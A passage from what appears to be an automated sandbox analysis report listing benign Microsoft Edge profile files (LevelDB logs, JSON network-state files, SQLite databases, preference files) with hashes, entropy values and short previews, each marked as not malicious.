SHA-512:	62A3F228EB03E0CB3E8B011B8AFBAA0E5042FD799F44C69571E0502FAE71493DDF746EDFA841857CCF32AE366325D569C3D6E27A8710DBE1B702CEADB9929780
Malicious:	false
Preview:	2024/11/08-20:47:24.866 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/08-20:47:24.868 1e58 Recovering log #3.2024/11/08-20:47:24.871 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.2482018913743
Encrypted:	false
SSDEEP:	12:N7vLZYebvqBQFUt8Ei1/+E8bT54ZYebvqBvJ:NblYebvZg8ESWFoYebvk
MD5:	359626C832238B41F6A728294A95FACE
SHA1:	B19CD82AC49869BABF97BE2FFBD39CF03B1BA2C1
SHA-256:	D0C562838ECF35E1E844F796D9E37E0D382FE25903CD255E480FAF46E4C2E3E8
SHA-512:	62A3F228EB03E0CB3E8B011B8AFBAA0E5042FD799F44C69571E0502FAE71493DDF746EDFA841857CCF32AE366325D569C3D6E27A8710DBE1B702CEADB9929780
Malicious:	false
Preview:	2024/11/08-20:47:24.866 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/08-20:47:24.868 1e58 Recovering log #3.2024/11/08-20:47:24.871 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5400c3a8-24ea-4689-be26-6c497f893e70.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5a57ceb0-6faf-4c9b-9e7c-b543d54a2057.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\8ee94cb9-4da2-4c1c-8224-2bf68ebf2e48.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF25569.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2620b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ed6f0be5-19fc-4da1-93d8-30992697e0b9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\fa32c60b-73e0-480d-be6c-8d239b52cec6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.232115126795637
Encrypted:	false
SSDEEP:	12:dovLZYebvqBZFUt8cYKX/+j54ZYebvqBaJ:ElYebvyg8+koYebvL
MD5:	1E7C361D0D2E60B0C0EEA74B8AE9F671
SHA1:	616FCDE5A7BD5B07EC6EE8D5B0BAD8F970E5875C
SHA-256:	C20814F13797A31256024819A1B84353292C379708EE8C828A0540FC09022364
SHA-512:	57248C22A52C47F837B658C5F7424ABD6E8FF6D14883BBD27665D81DDB2D6CE1562626B619CFC1A280FEAE1AC257597A7B35A164678D65C3D7A0DEC85C86D6D5
Malicious:	false
Preview:	2024/11/08-20:47:43.148 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/08-20:47:43.151 1dc8 Recovering log #3.2024/11/08-20:47:43.154 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.232115126795637
Encrypted:	false
SSDEEP:	12:dovLZYebvqBZFUt8cYKX/+j54ZYebvqBaJ:ElYebvyg8+koYebvL
MD5:	1E7C361D0D2E60B0C0EEA74B8AE9F671
SHA1:	616FCDE5A7BD5B07EC6EE8D5B0BAD8F970E5875C
SHA-256:	C20814F13797A31256024819A1B84353292C379708EE8C828A0540FC09022364
SHA-512:	57248C22A52C47F837B658C5F7424ABD6E8FF6D14883BBD27665D81DDB2D6CE1562626B619CFC1A280FEAE1AC257597A7B35A164678D65C3D7A0DEC85C86D6D5
Malicious:	false
Preview:	2024/11/08-20:47:43.148 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/08-20:47:43.151 1dc8 Recovering log #3.2024/11/08-20:47:43.154 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.258105653136443
Encrypted:	false
SSDEEP:	6:HwTSyq2PcNwi23oH+TcwtpIFUt8YwTMx1Zmw+YwTMnRkwOcNwi23oH+Tcwta/WLJ:svLZYebmFUt861/+854ZYebaUJ
MD5:	373ADDAD698C1B199EB4DD8A5E66772C
SHA1:	624ACD35D306F5BFFFD86C5B9D1695E02D15E03A
SHA-256:	B61969BE55D0D1F22523F9F6437FF47618AF3339221197ED26B2F1F057D52DC0
SHA-512:	94C8AC285B7049614EAAEE3D8303006C996597A771748E719C74E751FCCE9C773929D938B330006E83B7D88FB85DD56E7B8392D8757D042674EE10507BB1F517
Malicious:	false
Preview:	2024/11/08-20:47:23.689 1bc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/08-20:47:23.690 1bc0 Recovering log #3.2024/11/08-20:47:23.690 1bc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.258105653136443
Encrypted:	false
SSDEEP:	6:HwTSyq2PcNwi23oH+TcwtpIFUt8YwTMx1Zmw+YwTMnRkwOcNwi23oH+Tcwta/WLJ:svLZYebmFUt861/+854ZYebaUJ
MD5:	373ADDAD698C1B199EB4DD8A5E66772C
SHA1:	624ACD35D306F5BFFFD86C5B9D1695E02D15E03A
SHA-256:	B61969BE55D0D1F22523F9F6437FF47618AF3339221197ED26B2F1F057D52DC0
SHA-512:	94C8AC285B7049614EAAEE3D8303006C996597A771748E719C74E751FCCE9C773929D938B330006E83B7D88FB85DD56E7B8392D8757D042674EE10507BB1F517
Malicious:	false
Preview:	2024/11/08-20:47:23.689 1bc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/08-20:47:23.690 1bc0 Recovering log #3.2024/11/08-20:47:23.690 1bc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.265336111907793
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMHSAELyKOMq+8HKkjucswRv8p3nVumx:K0q+n0JH9ELyKOMq+8HKkjuczRv89l
MD5:	39C07D5BD8117E270406BA4623AB8FFA
SHA1:	994B2D0DD94F953F7DC3ADE54963482F3911454B
SHA-256:	FC0669A4AC057F5BFC9CDD61221671A95862C94D12B837F7119B87409C239817
SHA-512:	B7F91114D60E6BA301B513EB72324D4FD1C6B9162FB543D6E0DB8A899E04976B781806C0011B7EAAEFFA56B7543EB0EA7B4AE468FEA05EC83415F45912B0C323
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4668671436679573
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0ShkW:v7doKsKuKZKlZNmu46yjx0g
MD5:	9558F31C210B570127229150B17071C3
SHA1:	E9D57FBF2BBA2D6122919AA85A27F3D002A55FA5
SHA-256:	222295637023230147055DD64A912AC78B22A596207B1EB4D9A0E3D92667D3BA
SHA-512:	74B778949B2266734B8FE202841D1A49FCFF2343C8A98B4CC2C95B08C950AC320EE5BBCED838D10788AEF3922C8E3309F73647EA2AC2B792E530416A4E053AB7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cbdd7265-079e-46e1-a167-5fd69b00dc75.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17098), with no line terminators
Category:	dropped
Size (bytes):	17100
Entropy (8bit):	5.485880844056123
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP78pzkzNovnwKvmo5f58rbV+Fm5QwxrLPouC:sttPGKSu4asrutJ7wXeo2bGUQw1C
MD5:	0806E1EEEF077B066378F4294802E630
SHA1:	1F9D51265D5E0696FF68A94B8AFA35E9EAAECB27
SHA-256:	1ECEC1E86260FFAD47D474452AFD599A52AFF45EDCD80C3FB149BD95CDB87D6C
SHA-512:	F6ED3D01070941E93826E18BC8A7F6E197F76404CA8BF8B1DDE1EA5ACCE432FFE983BB56A9840A56B37AD123EE5F329D31D1D27766B31F1EFAC33520D3117AE8
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fb9e3e4e-79dc-42c1-8615-4704a08bd4ac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.1061903701630014
Encrypted:	false
SSDEEP:	12:Jntj7AQbntj7AXpEjVl/PnnnnnnnnnnnnvoQhEoZ:JntfAQbntfAZoPnnnnnnnnnnnnvLj
MD5:	7105EC01E82EC4C334A00B4734E08FAC
SHA1:	9FD9D1A2B4BCED189AA809308B8F7B608359360B
SHA-256:	04A737776ADB6C63A68F2EF671FCF8B08947A5FDE87D2789BBC691E72FAB8157
SHA-512:	D0113C396390D28FB7197E1136136BCDA6B102918299EA9CB39637B5F3EE79B6EE9EF1711C0F5F06617DABC9A7F98FBA79543C60C1C39FF89FF09E9E5D98B92A
Malicious:	false
